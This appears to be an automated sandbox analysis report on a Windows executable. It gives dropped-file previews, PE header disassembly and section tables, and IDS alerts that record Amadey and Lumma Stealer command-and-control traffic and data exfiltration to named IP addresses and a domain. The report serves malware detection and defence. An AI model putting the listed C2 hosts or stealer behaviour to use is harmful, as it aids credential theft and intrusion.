                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):175897
                                                                                                                                                                                                                                                              Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                              SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                              SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                              SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi||(_.Yi=new Zi)).set(a,b);(_.$i||(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a|1};_.hj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.ij=function(a,b,c){32&b&&c||(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):5162
                                                                                                                                                                                                                                                              Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                              SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                              SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                              SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1660
                                                                                                                                                                                                                                                              Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                              SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                              SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                              SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):73319
                                                                                                                                                                                                                                                              Entropy (8bit):6.023928661569486
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:98B2985B31BACD87AE2B0CABE8C78739
                                                                                                                                                                                                                                                              SHA1:49D00DCCC18526FC8828861DAEA802DAAFCECE34
                                                                                                                                                                                                                                                              SHA-256:CEE61FB2AAC652A91C53366677E9DD92B11B2FF4825E34F41EF853FEB1831E4D
                                                                                                                                                                                                                                                              SHA-512:1B3B805C2098DF70F4FDE514A0FFEF9C5FF4FDEFAA9383C65281437E77EBA71DB78299CE8091516344355FD7FEBC803B2AB0AB85F24E25F89E2BAAD1E20AD493
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:)]}'.{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz+krP/iqj/sNz/tOL8m8r+ZXbZivzci/r/Mi3/eJD/hKH/nNX8W2n/NTL8XWzbjP4P/Oj9ODb6XXn/My/5OTjCZXX4WnW2WW8D++H7S3T+TF/7NDHWVH38ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+oAy+UAnen+50r97Fj+6lD961k0hvgsg/stg/pdZ14A8f8A2PH/6Uv97Vb/7U/+7VIvgfctg/sH9tD95kv+6k/ZzFRmV1QA/sX85EqHg1qmlUj33UIHpUkBrEgFp0x6dFUAI+Nzfolwe3KQnbBdWVxeX1+xTk+z/+Gdx86s4ez88WiJTU1pbmqEoKW05/qk9NG16PwBsUav/N4axCkQfj16UU91KXqNQJgVgUAFsWg/PM37vhB7VG37uQ/8wA7+uwH5vxGen3r7gNb/gtrZi//7vRCw/eDVsStAqOw3jfnz+p0+rO7ld9xEo+rbi/7TavjVffPNL/2cTa6nbsrbi/6eXbIyh/tqjvpvjf7+Tay1qFNxivx1kP9Tif2Vj
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):350
                                                                                                                                                                                                                                                              Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                                                              SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                                                              SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                                                              SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                              Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):6.675956678732107
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                                                              File size:3'263'488 bytes
                                                                                                                                                                                                                                                              MD5:cf6393e173fb6315d0c681bc78eb3528
                                                                                                                                                                                                                                                              SHA1:26dc307ae4ea1866d40c9a34e38768733ec30b34
                                                                                                                                                                                                                                                              SHA256:3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d
                                                                                                                                                                                                                                                              SHA512:47e722c9f4736faf9612aff748cb4e1211e00ffe0fe56a65dc0dbec07f7b5e81908269d7c31066250866f3459727874d88c27fa88be08e540d0eb1e048ced61f
                                                                                                                                                                                                                                                              SSDEEP:24576:O/Nvd7MjWuH7NZRmw3vb+VBi7cCgTUvRS6r0EexLRdno+gSMW7GQJKTJjmX0/4hH:kliWo533j+na3bJrGYnlCJMdPS/b
                                                                                                                                                                                                                                                              TLSH:E0E53A52A514B1CBD4DA17BD842BDE615D7D82F4672008C3B838A5FAFE63CC015B7CAA
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                              Entrypoint:0x71d000
                                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              jmp 00007F0E6451699Ah
                                                                                                                                                                                                                                                              rsm
                                                                                                                                                                                                                                                              xor dword ptr [eax], eax
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              jmp 00007F0E64518995h
                                                                                                                                                                                                                                                              add byte ptr [esi], al
                                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add al, byte ptr [eax]
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [esi], al
                                                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add dword ptr [edx], ecx
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x31bc940x10dblbhqnk
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x31bc440x18dblbhqnk
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              0x10000x680000x680003dccd6b18f1f732822e2d2c807fb6442False0.5582275390625data7.022156452672956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              dblbhqnk0x6b0000x2b10000x2b0e0084a69ff91ff38749b62eafa9674680c3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              rrjzixml0x31c0000x10000x400bb9b8d5f87f72857856ce9047309f2f8False0.8115234375data6.3039551381799885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .taggant0x31d0000x30000x22009f03f090c131b008833a8b124397acf1False0.06353400735294118DOS executable (COM)0.8102681053916871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                                              RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-12-22T02:16:07.338429+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449753185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:12.042671+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976531.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:18.699038+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449759TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:20.050715+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449785185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:21.681018+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44978731.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:27.157819+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449802185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:27.549091+01002058397ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)1192.168.2.4571731.1.1.153UDP
                                                                                                                                                                                                                                                              2024-12-22T02:16:28.617935+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44980431.41.244.1180TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:29.118059+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449806172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:29.118059+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449806172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:29.867508+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449806172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:29.867508+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449806172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:31.600922+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449814172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:31.600922+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449814172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:32.377836+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449814172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:32.377836+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449814172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:35.270547+01002058398ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)1192.168.2.449822172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:35.270547+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449822172.67.209.202443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:35.730536+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449823104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:35.972597+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449824185.215.113.4380TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:36.162646+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449823104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:36.162646+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449823104.21.67.146443TCP
                                                                                                                                                                                                                                                              2024-12-22T02:16:36.418896+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449822172.67.209.202443TCP
